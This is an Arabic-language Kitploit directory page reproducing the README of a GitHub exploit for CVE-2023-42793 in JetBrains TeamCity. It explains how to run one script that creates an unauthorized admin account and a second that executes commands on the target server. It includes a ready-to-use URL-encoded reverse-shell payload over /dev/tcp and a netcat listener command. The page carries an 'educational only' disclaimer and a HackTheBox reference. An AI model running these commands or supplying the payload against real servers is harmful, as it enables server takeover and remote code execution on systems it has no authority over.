Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/b4l3ri0n/cve-2023-42793
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمأداة الوصول عن بعد
GitHubb4l3ri0n/cve-2023-42793

CVE-2023-42793

JetBrains TeamCity 2023.05.3 - تنفيذ الأوامر عن بُعد (RCE)، CVE-2023-42793

عرض المستودع
113منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
الموقع الإلكتروني

CVE-2023-42793 - إنشاء حساب مدير TeamCity يؤدي إلى RCE

استخدم exploit.py أولاً لإنشاء حساب مدير لك ثم استخدم rce.py لتنفيذ الأوامر على الهدف، وللـ reverse shell تحقق من هذا

سكربت الاستغلال

الوصف

يقوم هذا السكربت باستغلال CVE-2023-42793 لإنشاء حساب مدير على خادم TeamCity. يرسل طلب POST إلى عنوان URL الهدف لإنشاء مستخدم مدير ببيانات اعتماد محددة أو عشوائية.

الاستخدام

root@kitploit:~
python exploit.py -u <URL> [-v] [-n <USERNAME>] [-p <PASSWORD>] [-e <EMAIL>]

الخيارات

  • -u, --url URL: عنوان URL الهدف (مطلوب)
  • -v, --verbose: تفعيل وضع التفصيل
  • -n, --username USERNAME: تحديد اسم المستخدم (الافتراضي: عشوائي)
  • -p, --password PASSWORD: تحديد كلمة المرور (الافتراضي: عشوائي)
  • -e, --email EMAIL: تحديد البريد الإلكتروني (الافتراضي: عشوائي)
  • -t, --token-file: ملف لحفظ الرمز المميز

المتطلبات الأساسية

  • Python 3.x
  • مكتبات Python
    • لتثبيت التبعيات pip3 install -r requirements.txt

أمثلة

  1. الاستغلال باسم مستخدم وكلمة مرور وبريد إلكتروني عشوائي:

    root@kitploit:~
    python exploit.py -u http://target.com
    
  2. الاستغلال باسم مستخدم وكلمة مرور وبريد إلكتروني محددين:

    root@kitploit:~
    python exploit.py -u http://target.com -n admin -p admin123 -e [email protected]
    

المخرجات

عند نجاح الاستغلال، يقوم السكربت بطباعة عنوان URL واسم المستخدم وكلمة المرور لحساب المدير الذي تم إنشاؤه ثم يحفظ المخرجات في ملف الرمز المميز.

سكربت تنفيذ الأوامر عن بُعد (RCE)

الوصف يتيح هذا السكربت تنفيذ الأوامر على خادم TeamCity ضعيف مستغلًا CVE-2023-42793. يقوم أولاً بتمكين عمليات التصحيح ثم ينفذ الأمر المحدد باستخدام نقاط نهاية API المناسبة.

الاستخدام

root@kitploit:~
python rce_exploit.py -u <URL> [-v] [-c <COMMAND>] [-P <PORT>]

الخيارات

  • -u, --url URL: عنوان URL الهدف (مطلوب)
  • -t, --token-file: لتحديد الملف الذي يحتوي على الرمز المميز
  • -c, --command COMMAND: تحديد الأمر المراد تنفيذه (RCE)
  • -P, --port PORT: تحديد المنفذ (الافتراضي هو 80)

مثال

الاستغلال بأمر محدد:

root@kitploit:~
python rce.py -u http://target.com -t token -c "whoami"

للـ reverse shell

root@kitploit:~
python3 rce.py -u http://target.com -t token -c '"/bin/bash"&params="-c"&params="sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{IP}%2F{port}%200%3E%261"'
  • في هذا الأمر للـ reverse shell استبدل {IP} بعنوان IP الخاص بك و {port} بالمنفذ الذي تستمع عليه
  • أنشئ مستمعًا باستخدام nc مثلاً nc -nvlp 5555
  • للمزيد تحقق من revshells

ملاحظات

  • تم اختبار هذا السكربت على Runner.htb من hack the box
  • هذا السكربت لأغراض تعليمية فقط.
  • استخدمه بمسؤولية وفقط على الأنظمة المصرح لك باختبارها.

الاعتمادات

  • Zyad Elsayed
    • مستودع GitHub: Zyad-Elsayed
    • حساب LinkedIn: zyad-abdelbary
  • الاستغلال الأصلي لحساب المدير: ByteHunter (Exploit-DB)

المصادر

  • وصف CVE-2023-42793: الوصف الرسمي لثغرة CVE.
  • إدخال قاعدة بيانات الاستغلال: كود الاستغلال الأصلي على Exploit Database.
  • مدونة TeamCity: منشور مدونة يناقش ثغرة CVE-2023-42793 في TeamCity.
  • وثائق TeamCity: الوثائق الرسمية لـ TeamCity.
تنزيل الأداة